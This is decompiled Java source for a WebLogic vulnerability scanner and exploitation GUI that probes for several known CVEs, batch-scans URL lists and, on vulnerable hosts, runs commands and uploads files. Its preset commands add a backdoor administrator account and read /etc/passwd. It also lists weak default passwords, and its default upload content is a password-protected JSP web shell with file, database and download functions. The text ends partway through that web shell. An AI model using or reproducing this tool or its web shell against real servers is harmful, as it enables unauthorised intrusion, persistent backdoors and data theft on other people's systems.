package view;

import com.intellij.uiDesigner.UIFormXmlConstants;
import java.awt.Color;
import java.awt.Component;
import java.awt.Container;
import java.awt.EventQueue;
import java.awt.Font;
import java.awt.Point;
import java.awt.Rectangle;
import java.awt.event.ActionEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Vector;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;
import javax.swing.DefaultComboBoxModel;
import javax.swing.GroupLayout;
import javax.swing.JButton;
import javax.swing.JCheckBox;
import javax.swing.JComboBox;
import javax.swing.JDesktopPane;
import javax.swing.JFileChooser;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JLayeredPane;
import javax.swing.JMenu;
import javax.swing.JMenuBar;
import javax.swing.JMenuItem;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JPopupMenu;
import javax.swing.JScrollPane;
import javax.swing.JTabbedPane;
import javax.swing.JTable;
import javax.swing.JTextArea;
import javax.swing.JTextField;
import javax.swing.JTextPane;
import javax.swing.LayoutStyle;
import javax.swing.SwingWorker;
import javax.swing.border.CompoundBorder;
import javax.swing.border.EmptyBorder;
import javax.swing.border.TitledBorder;
import javax.swing.table.DefaultTableModel;
import net.miginfocom.layout.UnitValue;
import payload.BaseCheck;
import payload.BasePayload;
import payload.CONSOLE;
import payload.CVE_2014_4210;
import payload.CVE_2017_10271_10;
import payload.CVE_2017_10271_12;
import payload.CVE_2017_3506;
import payload.CVE_2018_2894;
import payload.CVE_2019_2725_10;
import payload.CVE_2019_2725_10_bypass;
import payload.CVE_2019_2725_12;
import util.Tool;

/* loaded from: input_file:view/Tools.class */
public class Tools extends JFrame {
    public static AtomicInteger count = new AtomicInteger(0);
    private JMenuBar menuBar1;
    private JMenu menu1;
    private JMenuItem update;
    private JMenu menu2;
    private JMenuItem gywm;
    private JDesktopPane table;
    private JLabel label1;
    private JLabel label2;
    private JTextField txt_url;
    private JButton jbtn_start;
    private JButton jbtn_clearLog;
    private JComboBox<String> jcombox_vuls;
    private JTabbedPane tabbedPane1;
    private JPanel panel1;
    private JScrollPane scrollPane1;
    private JTextPane jtxtp_info;
    private JPanel panel2;
    private JLabel label3;
    private JComboBox<String> jcombox_cmd;
    private JButton jbtn_execmd;
    private JScrollPane scrollPane3;
    private JTextArea jtxt_cmd_result;
    private JComboBox<String> jcombox_encoding;
    private JPanel panel3;
    private JLabel label4;
    private JTextField jtxt_filepath;
    private JButton jbtn_uploadFile;
    private JScrollPane scrollPane4;
    private JTextPane jtxt_fileContent;
    private JCheckBox jcheckBox_use_user_path;
    private JPanel panel4;
    private JLabel label5;
    private JComboBox<String> j_combox_threadSize;
    private JLabel label6;
    private JTextField jtxt_batch_chek_path;
    private JButton jbtn_batch_check_import;
    private JButton jbtn_batch_check_start;
    private JButton jbtn_batch_check_stop;
    private JLabel label7;
    private JLabel label8;
    private JLabel jlable_useTime;
    private JLabel jlabel_check_status;
    private JScrollPane scrollPane5;
    private JTable jtable_batch_check_result;
    private JScrollPane scrollPane2;
    private JTextArea jtxt_log;
    private JButton jbtn_qun_start;
    private JPopupMenu jPopupMenu1;
    private JMenuItem jmenu_c_export;
    private JMenuItem jmenu_c_del_select_rows;
    private HashSet<String> list_check = new HashSet<>();
    private ExecutorService es = null;
    private JLabel status_lable = null;
    private SwingWorker batch_startWork = null;
    private SwingWorker batch_statusWork = null;

    /* JADX INFO: Access modifiers changed from: private */
    public void log(String str) {
        this.jtxt_log.append(str + "--" + Tool.getDate() + "\r\n");
    }

    public Tools() {
        initComponents();
    }

    private void menuItem1ActionPerformed(ActionEvent actionEvent) {
        JOptionPane.showMessageDialog((Component) null, "有建议可以添加唐小风vx：tangxiaofeng7");
    }

    private void jbtn_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_start.setEnabled(false);
        dispatch('c');
        this.jbtn_start.setEnabled(true);
    }

    private void dispatch(char c) {
        String checkTheURL = Tool.checkTheURL(this.txt_url.getText());
        try {
            final BasePayload payload2 = Tool.getPayload(this.jcombox_vuls.getSelectedItem().toString());
            CONSOLE console = new CONSOLE();
            CVE_2014_4210 cve_2014_4210 = new CVE_2014_4210();
            CVE_2018_2894 cve_2018_2894 = new CVE_2018_2894();
            CVE_2017_3506 cve_2017_3506 = new CVE_2017_3506();
            CVE_2017_10271_10 cve_2017_10271_10 = new CVE_2017_10271_10();
            CVE_2017_10271_12 cve_2017_10271_12 = new CVE_2017_10271_12();
            CVE_2019_2725_10 cve_2019_2725_10 = new CVE_2019_2725_10();
            CVE_2019_2725_12 cve_2019_2725_12 = new CVE_2019_2725_12();
            CVE_2019_2725_10_bypass cVE_2019_2725_10_bypass = new CVE_2019_2725_10_bypass();
            boolean checkVUL = console.checkVUL(checkTheURL);
            boolean checkVUL2 = cve_2014_4210.checkVUL(checkTheURL);
            boolean checkVUL3 = cve_2018_2894.checkVUL(checkTheURL);
            boolean checkVUL4 = cve_2017_3506.checkVUL(checkTheURL);
            boolean checkVUL5 = cve_2017_10271_10.checkVUL(checkTheURL);
            boolean checkVUL6 = cve_2017_10271_12.checkVUL(checkTheURL);
            boolean checkVUL7 = cve_2019_2725_10.checkVUL(checkTheURL);
            boolean checkVUL8 = cve_2019_2725_12.checkVUL(checkTheURL);
            boolean checkVUL9 = cVE_2019_2725_10_bypass.checkVUL(checkTheURL);
            switch (c) {
                case 'a':
                    if (checkVUL) {
                        log(checkTheURL + " 存在weblogic administrator 控制台路径泄漏漏洞!");
                    }
                    if (checkVUL2) {
                        log(checkTheURL + " 存在CVE-2014-4210 Weblogic SSRF漏洞");
                    }
                    if (checkVUL3) {
                        log(checkTheURL + " 存在CVE-2018-2894 任意文件上传漏洞");
                    }
                    if (checkVUL4) {
                        log(checkTheURL + " CVE-2017-3506 XMLDecoder 反序列化漏洞!");
                    }
                    if (checkVUL5) {
                        log(checkTheURL + " 存在CVE-2017-10271 XMLDecoder反序列化漏洞（1）！");
                    }
                    if (checkVUL6) {
                        log(checkTheURL + " 存在CVE-2017-10271 XMLDecoder反序列化漏洞（2）！");
                    }
                    if (checkVUL7) {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（1）！");
                    }
                    if (checkVUL8) {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（2）！");
                    }
                    if (!checkVUL9) {
                        log(checkTheURL + " 没有发现漏洞！");
                        break;
                    } else {
                        log(checkTheURL + " 存在CVE-2019-2725 wls9-async反序列化漏洞（3）！");
                        break;
                    }
                case 'b':
                    this.status_lable = this.jlabel_check_status;
                    EventQueue.invokeLater(new Runnable() { // from class: view.Tools.1
                        @Override // java.lang.Runnable
                        public void run() {
                        }
                    });
                    this.batch_startWork = new SwingWorker<Void, Void>() { // from class: view.Tools.2
                        /* JADX INFO: Access modifiers changed from: protected */
                        /* renamed from: doInBackground, reason: merged with bridge method [inline-methods] */
                        public Void m24doInBackground() throws Exception {
                            int i = 0;
                            Iterator it = Tools.this.list_check.iterator();
                            while (it.hasNext()) {
                                String str = (String) it.next();
                                BaseCheck baseCheck = new BaseCheck();
                                baseCheck.table = Tools.this.jtable_batch_check_result;
                                i++;
                                baseCheck.index = i;
                                baseCheck.url = str;
                                baseCheck.init(payload2);
                                Tools.this.es.execute(baseCheck);
                            }
                            Tools.this.es.shutdown();
                            while (!Tools.this.es.isTerminated()) {
                                Thread.sleep(200L);
                            }
                            Tools.this.log("批量完成");
                            return null;
                        }

                        protected void done() {
                            Tools.this.jbtn_batch_check_start.setEnabled(true);
                            if (Tools.this.batch_statusWork != null) {
                                Tools.this.batch_statusWork.cancel(true);
                            }
                        }
                    };
                    this.batch_startWork.execute();
                    this.batch_startWork = new SwingWorker<Void, Void>() { // from class: view.Tools.3
                        /* JADX INFO: Access modifiers changed from: protected */
                        /* renamed from: doInBackground, reason: merged with bridge method [inline-methods] */
                        public Void m25doInBackground() throws Exception {
                            int i = 0;
                            while (true) {
                                Tools.this.status_lable.setText(Tools.count.get() + "/" + Tools.this.list_check.size());
                                Tools.this.jlable_useTime.setText(i + "");
                                Thread.sleep(1000L);
                                i++;
                            }
                        }
                    };
                    this.batch_statusWork.execute();
                    break;
                case 'c':
                    if (!payload2.checkVUL(checkTheURL)) {
                        log(checkTheURL + "不存在漏洞！");
                        JOptionPane.showMessageDialog((Component) null, "不存在漏洞", "漏洞验证结果", 1);
                        break;
                    } else {
                        log(checkTheURL + "存在漏洞！");
                        log("当前应用目录：" + payload2.getWebPath(checkTheURL).replace("\\", "/"));
                        JOptionPane.showMessageDialog((Component) null, "存在漏洞", "漏洞验证结果", 0);
                        break;
                    }
                case 'm':
                    this.jtxt_cmd_result.setText(payload2.exeCMD(checkTheURL, this.jcombox_cmd.getSelectedItem().toString(), this.jcombox_encoding.getSelectedItem().toString()));
                    break;
                case 'u':
                    String uploadFile = payload2.uploadFile(checkTheURL, this.jtxt_fileContent.getText(), this.jtxt_filepath.getText(), this.jcheckBox_use_user_path.isSelected());
                    if (!"".equals(uploadFile)) {
                        log(checkTheURL + "上传完成！，请核查是否成功，地址：" + uploadFile);
                        JOptionPane.showMessageDialog((Component) null, "上传完成！", "上传结果", 1);
                        break;
                    } else {
                        log(checkTheURL + "上传失败！");
                        JOptionPane.showMessageDialog((Component) null, "上传失败！", "上传结果", 1);
                        break;
                    }
            }
        } catch (Exception e) {
            log(e.toString());
        }
    }

    private void jbtn_clearLogActionPerformed(ActionEvent actionEvent) {
        this.jtxt_log.setText("");
    }

    private void jbtn_uploadFileActionPerformed(ActionEvent actionEvent) {
        this.jbtn_uploadFile.setEnabled(false);
        dispatch('u');
        this.jbtn_uploadFile.setEnabled(true);
    }

    private void jbtn_execmdActionPerformed(ActionEvent actionEvent) {
        this.jbtn_execmd.setEnabled(false);
        dispatch('m');
        this.jbtn_execmd.setEnabled(true);
    }

    private void jbtn_batch_check_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_batch_check_start.setEnabled(false);
        count = new AtomicInteger(0);
        if (this.list_check.size() <= 0) {
            JOptionPane.showMessageDialog((Component) null, "请先导入检查URL！", "URL批量检查", 2);
            this.jbtn_batch_check_start.setEnabled(true);
        } else {
            int parseInt = Integer.parseInt(this.j_combox_threadSize.getSelectedItem().toString());
            this.jtable_batch_check_result.getModel().setRowCount(0);
            this.es = Executors.newFixedThreadPool(parseInt);
            dispatch('b');
        }
    }

    private void jbtn_batch_check_importActionPerformed(ActionEvent actionEvent) {
        JFileChooser jFileChooser = new JFileChooser();
        jFileChooser.setFileSelectionMode(0);
        jFileChooser.showDialog(new JLabel(), "选择");
        File selectedFile = jFileChooser.getSelectedFile();
        if (selectedFile != null) {
            this.jtxt_batch_chek_path.setText(selectedFile.getAbsolutePath());
            this.list_check = Tool.read(selectedFile.getAbsolutePath(), "UTF-8");
            JOptionPane.showMessageDialog((Component) null, "导入了" + this.list_check.size() + "个URL！", "导入URL", 1);
        }
    }

    private void jbtn_batch_check_stopActionPerformed(ActionEvent actionEvent) {
        if (this.es != null) {
            this.es.shutdownNow();
            if (this.batch_startWork != null) {
                this.batch_startWork.cancel(true);
            }
            if (this.batch_statusWork != null) {
                this.batch_statusWork.cancel(true);
            }
            log("线程已经停止！");
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void scrollPane5MouseClicked(MouseEvent mouseEvent) {
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void jtable_batch_check_resultMouseClicked(MouseEvent mouseEvent) {
        if (mouseEvent.getButton() != 3 || this.jtable_batch_check_result.rowAtPoint(mouseEvent.getPoint()) == -1) {
            return;
        }
        this.jPopupMenu1.show(this.jtable_batch_check_result, mouseEvent.getX(), mouseEvent.getY());
    }

    private void jmenu_c_exportActionPerformed(ActionEvent actionEvent) {
        JFileChooser jFileChooser = new JFileChooser();
        jFileChooser.setFileSelectionMode(0);
        if (jFileChooser.showSaveDialog((Component) null) == 0) {
            OutputStreamWriter outputStreamWriter = null;
            BufferedWriter bufferedWriter = null;
            try {
                try {
                    outputStreamWriter = new OutputStreamWriter(new FileOutputStream(jFileChooser.getSelectedFile()), "UTF-8");
                    bufferedWriter = new BufferedWriter(outputStreamWriter);
                    Iterator it = this.jtable_batch_check_result.getModel().getDataVector().iterator();
                    while (it.hasNext()) {
                        Vector vector = (Vector) it.next();
                        StringBuffer stringBuffer = new StringBuffer();
                        stringBuffer.append(vector.get(2));
                        if (stringBuffer.length() >= 1) {
                            stringBuffer.deleteCharAt(stringBuffer.length() - 1);
                        }
                        bufferedWriter.write(stringBuffer.toString());
                        bufferedWriter.newLine();
                    }
                    if (bufferedWriter != null) {
                        try {
                            bufferedWriter.flush();
                            bufferedWriter.close();
                        } catch (IOException e) {
                            log(e.getMessage());
                            return;
                        }
                    }
                    if (outputStreamWriter != null) {
                        outputStreamWriter.close();
                    }
                } catch (Exception e2) {
                    log("保存异常！" + e2.getMessage());
                    if (bufferedWriter != null) {
                        try {
                            bufferedWriter.flush();
                            bufferedWriter.close();
                        } catch (IOException e3) {
                            log(e3.getMessage());
                            return;
                        }
                    }
                    if (outputStreamWriter != null) {
                        outputStreamWriter.close();
                    }
                }
            } catch (Throwable th) {
                if (bufferedWriter != null) {
                    try {
                        bufferedWriter.flush();
                        bufferedWriter.close();
                    } catch (IOException e4) {
                        log(e4.getMessage());
                        throw th;
                    }
                }
                if (outputStreamWriter != null) {
                    outputStreamWriter.close();
                }
                throw th;
            }
        }
    }

    private void jmenu_c_del_select_rowsActionPerformed(ActionEvent actionEvent) {
        int[] selectedRows = this.jtable_batch_check_result.getSelectedRows();
        if (selectedRows.length <= 0) {
            JOptionPane.showMessageDialog((Component) null, "未选中需要删除的数据！", "删除选中行", 2);
            return;
        }
        DefaultTableModel model2 = this.jtable_batch_check_result.getModel();
        for (int i = 0; i < selectedRows.length; i++) {
            model2.removeRow(this.jtable_batch_check_result.getSelectedRow());
        }
        JOptionPane.showMessageDialog((Component) null, "删除成功！", "删除选中行", 1);
    }

    private void jmenu_exportActionPerformed(ActionEvent actionEvent) {
    }

    private void updateActionPerformed(ActionEvent actionEvent) {
        JOptionPane.showMessageDialog((Component) null, "联系vx:tangxiaofeng7，贡献exp");
    }

    private void gywmActionPerformed(ActionEvent actionEvent) {
        JOptionPane.showMessageDialog((Component) null, "关注公众号《雷石安全实验室》");
    }

    private void jbtn_qun_startActionPerformed(ActionEvent actionEvent) {
        this.jbtn_qun_start.setEnabled(false);
        dispatch('a');
        this.jbtn_qun_start.setEnabled(true);
    }

    /* JADX WARN: Type inference failed for: r4v102, types: [java.lang.Object[], java.lang.Object[][]] */
    private void initComponents() {
        this.menuBar1 = new JMenuBar();
        this.menu1 = new JMenu();
        this.update = new JMenuItem();
        this.menu2 = new JMenu();
        this.gywm = new JMenuItem();
        this.table = new JDesktopPane();
        this.label1 = new JLabel();
        this.label2 = new JLabel();
        this.txt_url = new JTextField();
        this.jbtn_start = new JButton();
        this.jbtn_clearLog = new JButton();
        this.jcombox_vuls = new JComboBox<>();
        this.tabbedPane1 = new JTabbedPane();
        this.panel1 = new JPanel();
        this.scrollPane1 = new JScrollPane();
        this.jtxtp_info = new JTextPane();
        this.panel2 = new JPanel();
        this.label3 = new JLabel();
        this.jcombox_cmd = new JComboBox<>();
        this.jbtn_execmd = new JButton();
        this.scrollPane3 = new JScrollPane();
        this.jtxt_cmd_result = new JTextArea();
        this.jcombox_encoding = new JComboBox<>();
        this.panel3 = new JPanel();
        this.label4 = new JLabel();
        this.jtxt_filepath = new JTextField();
        this.jbtn_uploadFile = new JButton();
        this.scrollPane4 = new JScrollPane();
        this.jtxt_fileContent = new JTextPane();
        this.jcheckBox_use_user_path = new JCheckBox();
        this.panel4 = new JPanel();
        this.label5 = new JLabel();
        this.j_combox_threadSize = new JComboBox<>();
        this.label6 = new JLabel();
        this.jtxt_batch_chek_path = new JTextField();
        this.jbtn_batch_check_import = new JButton();
        this.jbtn_batch_check_start = new JButton();
        this.jbtn_batch_check_stop = new JButton();
        this.label7 = new JLabel();
        this.label8 = new JLabel();
        this.jlable_useTime = new JLabel();
        this.jlabel_check_status = new JLabel();
        this.scrollPane5 = new JScrollPane();
        this.jtable_batch_check_result = new JTable();
        this.scrollPane2 = new JScrollPane();
        this.jtxt_log = new JTextArea();
        this.jbtn_qun_start = new JButton();
        this.jPopupMenu1 = new JPopupMenu();
        this.jmenu_c_export = new JMenuItem();
        this.jmenu_c_del_select_rows = new JMenuItem();
        setTitle("Weblogic漏洞扫描工具-雷石安全实验室");
        setDefaultCloseOperation(3);
        setResizable(false);
        Container contentPane = getContentPane();
        this.menu1.setText("工具");
        this.update.setText("升级版本");
        this.update.addActionListener(actionEvent -> {
            updateActionPerformed(actionEvent);
        });
        this.menu1.add(this.update);
        this.menuBar1.add(this.menu1);
        this.menu2.setText("关于我们");
        this.gywm.setText("实验室");
        this.gywm.addActionListener(actionEvent2 -> {
            gywmActionPerformed(actionEvent2);
        });
        this.menu2.add(this.gywm);
        this.menuBar1.add(this.menu2);
        setJMenuBar(this.menuBar1);
        this.table.setBackground(new Color(153, 153, 153));
        this.label1.setText("选择漏洞：");
        this.label1.setBackground(Color.black);
        this.table.add(this.label1, JLayeredPane.DEFAULT_LAYER);
        this.label1.setBounds(10, 25, 80, this.label1.getPreferredSize().height);
        this.label2.setText("地址：");
        this.table.add(this.label2, JLayeredPane.DEFAULT_LAYER);
        this.label2.setBounds(550, 25, 45, this.label2.getPreferredSize().height);
        this.txt_url.setText("http://127.0.0.1:7001/");
        this.table.add(this.txt_url, JLayeredPane.DEFAULT_LAYER);
        this.txt_url.setBounds(600, 20, 295, this.txt_url.getPreferredSize().height);
        this.jbtn_start.setText("检 测");
        this.jbtn_start.addActionListener(actionEvent3 -> {
            jbtn_startActionPerformed(actionEvent3);
        });
        this.table.add(this.jbtn_start, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_start.setBounds(new Rectangle(new Point(930, 20), this.jbtn_start.getPreferredSize()));
        this.jbtn_clearLog.setText("清空日志");
        this.jbtn_clearLog.addActionListener(actionEvent4 -> {
            jbtn_clearLogActionPerformed(actionEvent4);
        });
        this.table.add(this.jbtn_clearLog, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_clearLog.setBounds(new Rectangle(new Point(1140, 20), this.jbtn_clearLog.getPreferredSize()));
        this.jcombox_vuls.setModel(new DefaultComboBoxModel(new String[]{"Weblogic Aministrator 控制台路径泄露漏洞", "CVE-2014-4210 Weblogic SSRF漏洞", "CVE-2017-3506 XMLDecoder 反序列化漏洞", "CVE-2018-2894 任意文件上传漏洞", "CVE-2017-10271 XMLDecoder反序列化漏洞（1）", "CVE-2017-10271 XMLDecoder反序列化漏洞（2）", "CVE-2019-2725 wls9-async反序列化漏洞（1）", "CVE-2019-2725 wls9-async反序列化漏洞（2）", "CVE-2019-2725 wls9-async反序列化漏洞（3）"}));
        this.table.add(this.jcombox_vuls, JLayeredPane.DEFAULT_LAYER);
        this.jcombox_vuls.setBounds(70, 20, 475, this.jcombox_vuls.getPreferredSize().height);
        this.panel1.setBorder(new CompoundBorder(new TitledBorder(new EmptyBorder(0, 0, 0, 0), "JFormDesigner Evaluation", 2, 5, new Font("Dialog", 1, 12), Color.red), this.panel1.getBorder()));
        this.panel1.addPropertyChangeListener(new PropertyChangeListener() { // from class: view.Tools.4
            @Override // java.beans.PropertyChangeListener
            public void propertyChange(PropertyChangeEvent propertyChangeEvent) {
                if (UIFormXmlConstants.ELEMENT_BORDER.equals(propertyChangeEvent.getPropertyName())) {
                    throw new RuntimeException();
                }
            }
        });
        this.jtxtp_info.setText("V2.0\n\n增加批量检测漏洞功能\n\n去除登陆密码框\n\nV1.0\n\nweblogic administrator 控制台路径泄漏漏洞\n弱口令\nWebLogic, weblogic, Oracle@123, password, system, Administrator, admin\n\n\nCVE-2014-4210 Weblogic SSRF漏洞: \n影响版本 : 10.0.2，10.3.6 \nhttp://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp\n\n\nCVE-2017-3506&CVE-2017-10271 XMLDecoder 反序列化漏洞:\n影响版本 : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n\nCVE-2018-2894 任意文件上传\n影响版本：10.3.6.0，12.1.3.0，12.2.1.2，12.2.1.3\n\n\nCVE-2019-2725 wls9-async反序列化漏洞\n影响版本：10.3.6.0, 12.1.3.0\n\n");
        this.scrollPane1.setViewportView(this.jtxtp_info);
        GroupLayout groupLayout = new GroupLayout(this.panel1);
        this.panel1.setLayout(groupLayout);
        groupLayout.setHorizontalGroup(groupLayout.createParallelGroup().addGroup(groupLayout.createSequentialGroup().addGap(16, 16, 16).addComponent(this.scrollPane1, -2, 1185, -2).addContainerGap(19, 32767)));
        groupLayout.setVerticalGroup(groupLayout.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout.createSequentialGroup().addContainerGap(16, 32767).addComponent(this.scrollPane1, -2, 341, -2).addContainerGap()));
        this.tabbedPane1.addTab("基本信息", this.panel1);
        this.label3.setText("命令：");
        this.jcombox_cmd.setEditable(true);
        this.jcombox_cmd.setModel(new DefaultComboBoxModel(new String[]{"whoami", "ipconfig", "ifconfig", "net user txf txf /add", "net localgroup administrators txf /add", "cat /etc/passwd"}));
        this.jbtn_execmd.setText("执行");
        this.jbtn_execmd.addActionListener(actionEvent5 -> {
            jbtn_execmdActionPerformed(actionEvent5);
        });
        this.scrollPane3.setViewportView(this.jtxt_cmd_result);
        this.jcombox_encoding.setModel(new DefaultComboBoxModel(new String[]{"GBK", "UTF-8", "GB2313", "ISO-8859-1"}));
        GroupLayout groupLayout2 = new GroupLayout(this.panel2);
        this.panel2.setLayout(groupLayout2);
        groupLayout2.setHorizontalGroup(groupLayout2.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout2.createSequentialGroup().addGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.TRAILING).addGroup(groupLayout2.createSequentialGroup().addContainerGap().addComponent(this.scrollPane3, -1, 1189, 32767)).addGroup(GroupLayout.Alignment.LEADING, groupLayout2.createSequentialGroup().addGap(21, 21, 21).addComponent(this.label3, -2, 69, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jcombox_cmd, -2, 889, -2).addGap(29, 29, 29).addComponent(this.jcombox_encoding, -2, 77, -2).addGap(18, 18, 18).addComponent(this.jbtn_execmd, -1, 86, 32767))).addGap(25, 25, 25)));
        groupLayout2.setVerticalGroup(groupLayout2.createParallelGroup().addGroup(groupLayout2.createSequentialGroup().addContainerGap().addGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.label3).addComponent(this.jcombox_cmd, -2, -1, -2).addComponent(this.jcombox_encoding, -2, -1, -2).addComponent(this.jbtn_execmd)).addGap(18, 18, 18).addComponent(this.scrollPane3, -2, 275, -2).addContainerGap(34, 32767)));
        this.tabbedPane1.addTab("命令执行", this.panel2);
        this.label4.setText("文件路径：");
        this.jbtn_uploadFile.setText("上传文件");
        this.jbtn_uploadFile.addActionListener(actionEvent6 -> {
            jbtn_uploadFileActionPerformed(actionEvent6);
        });
        this.jtxt_fileContent.setText("<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!String Pwd=\"xmlpass\";String cs=\"UTF-8\";String EC(String s)throws Exception{return new String(s.getBytes(\"ISO-8859-1\"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split(\"\\r\\n\");Class.forName(x[0].trim());if(x[1].indexOf(\"jdbc:oracle\")!=-1){return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase(\"[/null]\")?\"\":x[2],x[3].equalsIgnoreCase(\"[/null]\")?\"\":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase(\"[/null]\")?\"\":x[2],x[3].equalsIgnoreCase(\"[/null]\")?\"\":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF=\"\";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\");for(int i=0; i<l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?\"R\":\"\";sQ +=l[i].canWrite()?\" W\":\"\";if(l[i].isDirectory()){sb.append(l[i].getName()+\"/\\t\"+sT+\"\\t\"+l[i].length()+\"\\t\"+sQ+\"\\n\");}else{sF+=l[i].getName()+\"\\t\"+sT+\"\\t\"+l[i].length()+\"\\t\"+sQ+\"\\n\";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k < x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write((\"->\"+\"|\").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write((\"|\"+\"<-\").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h=\"0123456789ABCDEF\";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i<d.length();i+=2){os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j<z.length; j++){HH(s+\"/\"+z[j].getName(),d+\"/\"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+\"\\t\");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split(\"\\r\\n\");ResultSet r=c.getMetaData().getTables(null,s.indexOf(\"jdbc:oracle\")!=-1?x.length>5?x[5]:x[4]:null,\"%\",new String[]{\"TABLE\"});while(r.next()){sb.append(r.getString(\"TABLE_NAME\")+\"\\t\");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split(\"\\r\\n\");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery(\"select * from \"+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+\" (\"+d.getColumnTypeName(i)+\")\\t\");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf(\"--f:\")!=-1?q.substring(0,q.indexOf(\"--f:\")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i <=n; i++){sb.append(d.getColumnName(i)+\"\\t|\\t\");}sb.append(\"\\r\\n\");if(q.indexOf(\"--f:\")!=-1){File file=new File(p);if(q.indexOf(\"-to:\")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf(\"-to:\")!=-1?p.trim():p+q.substring(q.indexOf(\"--f:\")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i<=n;i++){if(q.indexOf(\"--f:\")!=-1){bw.write(r.getObject(i)+\"\"+\"\\t\");bw.flush();}else{sb.append(r.getObject(i)+\"\"+\"\\t|\\t\");}}if(bw!=null){bw.newLine();}sb.append(\"\\r\\n\");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append(\"Result\\t|\\t\\r\\n\");try{m.executeUpdate(q);sb.append(\"Execute Successfully!\\t|\\t\\r\\n\");}catch(Exception ee){sb.append(ee.toString()+\"\\t|\\t\\r\\n\");}}m.close();c.close();}%><%cs=request.getParameter(\"z0\")!=null?request.getParameter(\"z0\")+\"\":cs;response.setContentType(\"text/html\");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer(\"\");try{String Z=EC(request.getParameter(Pwd)+\"\");String 